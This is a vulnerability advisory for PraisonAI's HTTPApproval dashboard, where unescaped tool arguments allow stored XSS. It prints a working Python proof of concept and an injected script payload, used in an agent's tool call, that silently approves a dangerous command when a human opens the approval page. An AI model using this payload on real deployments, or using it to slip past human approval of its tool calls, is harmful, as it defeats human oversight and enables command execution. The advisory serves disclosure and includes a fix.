PT-2026-53126 · Pypi · Praisonai

Published

2026-06-18

·

Updated

2026-06-18

CVSS v3.1

8.8

High

VectorAV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

HTTPApproval dashboard renders tool arguments as raw HTML, allowing approval-page XSS to approve dangerous tools

Summary

praisonai.bots.HTTPApproval renders pending tool approval arguments directly into the approval dashboard HTML. An attacker-controlled tool argument can inject JavaScript into that page. When a human opens the approval URL to inspect the risky tool request, the script runs in the dashboard origin and can POST to the same request's /approve/{request id}/decide endpoint, causing HTTPApproval to return approved=True.
The local PoV uses a harmless touch /tmp/prai010 # command prefix and stops at the approval decision. It does not execute the command.

Affected Versions

Proposed affected range: >= 4.5.2, <= 4.6.57.
Validated affected:
  • current head 2f9677abb2ea68eab864ee8b6a828fd0141612e1 (v4.6.57-4-g2f9677ab)
  • v4.5.2
  • v4.5.3
  • v4.5.124
  • v4.5.126
  • v4.5.128
  • v4.6.10
  • v4.6.56
  • v4.6.57
v4.5.0 and v4.5.1 do not contain the HTTPApproval backend.

Impact

An attacker who can influence an agent task or prompt enough to produce a dangerous tool call can embed a short XSS payload in the tool argument. When the human approver opens the HTTP approval page, the script can approve the pending dangerous tool call before the human explicitly clicks Approve or Deny.
This bypasses the human-in-the-loop approval boundary for dangerous tools such as execute command, execute code, delete file, or other tools gated through HTTPApproval. If the agent continues after approval, the dangerous tool runs with the privileges of the PraisonAI process.

Why This Is Not Intended Behavior

PraisonAI documentation describes approval as a safety control that pauses an agent before risky tools and asks a human or configured channel to allow or deny execution. The documentation also lists http as a supported non-console approval backend.
Opening the approval page to inspect a risky command should not itself approve the command. The current behavior allows attacker-controlled tool arguments to execute script in the approval page and submit the approval action.
This is distinct from the previously published stored-XSS advisory for agent output rendering. That advisory concerned src/praisonai/api.py and missing nh3 sanitization in older versions. This report concerns the HTTPApproval dashboard sink and remains present in current head.

Root Cause

In src/praisonai/praisonai/bots/ http approval.py, build html() builds the approval page with raw f-string interpolation:
  • argument keys and values are appended to args html without HTML escaping;
  • tool name, risk level, and agent name are also interpolated into the returned HTML;
  • the generated page contains same-origin JavaScript that posts to /approve/{request id}/decide.
handle decide() accepts JSON from that endpoint and marks the pending request approved when decision == "approve".
Because the approval page is generated from the pending request's unescaped tool arguments, an injected script can call the same endpoint that the legitimate Approve button uses. The request id is unguessable, but the script runs inside the loaded approval page and can derive the endpoint from location.pathname.

Reproduction

The PoV is local-only and does not execute the dangerous tool command. Run it from a PraisonAI checkout or environment where praisonai and praisonaiagents import from the candidate version.
python
import asyncio
import json
import socket

import aiohttp
from praisonai.bots. http approval import HTTPApproval
from praisonaiagents.approval.protocols import ApprovalRequest


def free port():
  with socket.socket(socket.AF INET, socket.SOCK STREAM) as sock:
    sock.bind(("127.0.0.1", 0))
    return sock.getsockname()[1]


payload = (
  "touch /tmp/prai010 # "
  "</code><script>"
  "fetch(location.pathname+'/decide',{"
  "method:'POST',headers:{'Content-Type':'application/json'},"
  "body:'{"decision":"approve"}'})"
  "</script><code>"
)


async def main():
  backend = HTTPApproval(host="127.0.0.1", port=free port(), timeout=5)
  request = ApprovalRequest(
    tool name="execute command",
    arguments={"command": payload},
    risk level="critical",
    agent name="pov-agent",
  )
  task = asyncio.create task(backend.request approval(request))

  request id = ""
  for  in range(100):
    if backend. pending:
      request id = next(iter(backend. pending))
      break
    await asyncio.sleep(0.05)
  assert request id

  url = f"http://127.0.0.1:{backend. port}/approve/{request id}"
  async with aiohttp.ClientSession() as session:
    async with session.get(url) as response:
      page = await response.text()
    raw script present = "<script>fetch(location.pathname+'/decide'" in page
    script not html escaped = "&lt;script" not in page
    payload uses same origin decide endpoint = "fetch(location.pathname+'/decide'" in page
    payload not truncated = "..." not in page[
      page.find("<script>"):page.find("<script>") + len(payload) + 10
    ]
    assert raw script present
    assert script not html escaped
    assert payload not truncated

    # Same request the injected same-origin script submits.
    async with session.post(f"{url}/decide", json={"decision": "approve"}) as response:
      post body = await response.text()

  decision = await task
  await backend.shutdown()
  print(json.dumps({
    "payload len": len(payload),
    "payload shell prefix": "touch /tmp/prai010",
    "raw script present": raw script present,
    "script not html escaped": script not html escaped,
    "payload uses same origin decide endpoint": payload uses same origin decide endpoint,
    "payload not truncated": payload not truncated,
    "post body": post body,
    "decision approved": decision.approved,
    "decision reason": decision.reason,
    "vulnerable": bool(
      raw script present
      and script not html escaped
      and payload uses same origin decide endpoint
      and payload not truncated
      and decision.approved
    ),
  }, indent=2))


asyncio.run(main())
Expected affected output includes:
json
{
 "payload len": 175,
 "payload shell prefix": "touch /tmp/prai010",
 "raw script present": true,
 "script not html escaped": true,
 "payload uses same origin decide endpoint": true,
 "payload not truncated": true,
 "decision approved": true,
 "vulnerable": true
}
The relevant injected argument shape is:
text
touch /tmp/prai010 # </code><script>fetch(location.pathname+'/decide',{method:'POST',headers:{'Content-Type':'application/json'},body:'{"decision":"approve"}'})</script><code>
The shell prefix demonstrates that the same argument can be executable shell syntax after approval; the PoV stops before executing the tool.

Suggested Fix

Escape every untrusted value before inserting it into the approval HTML:
  • tool name
  • risk level
  • agent name
  • every argument key
  • every argument value
For example, use html.escape(str(value), quote=True) or a template engine that auto-escapes by default. Add regression tests that include </code><script>... in tool arguments and assert that the rendered page contains escaped text, not a script element.
Minimal patch shape:
python
from html import escape


def h(value: object) -> str:
  return escape(str(value), quote=True)


tool name = h(info.get("tool name", "unknown"))
risk level = h(info.get("risk level", "unknown"))
agent name = h(info.get("agent name", ""))

args html = ""
for k, v in arguments.items():
  val str = str(v)
  if len(val str) > 200:
    val str = val str[:197] + "..."
  args html += (
    f"<tr><td><code>{h(k)}</code></td>"
    f"<td><code>{h(val str)}</code></td></tr>"
  )
Additional hardening:
  • avoid inline JavaScript and add a restrictive Content Security Policy;
  • keep the request id as an unguessable capability, but do not rely on it as an XSS defense;
  • consider requiring a per-request decision token outside attacker-controlled rendered argument fields.

Fix

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

GHSA-63V4-W882-G4X2

Affected Products

Praisonai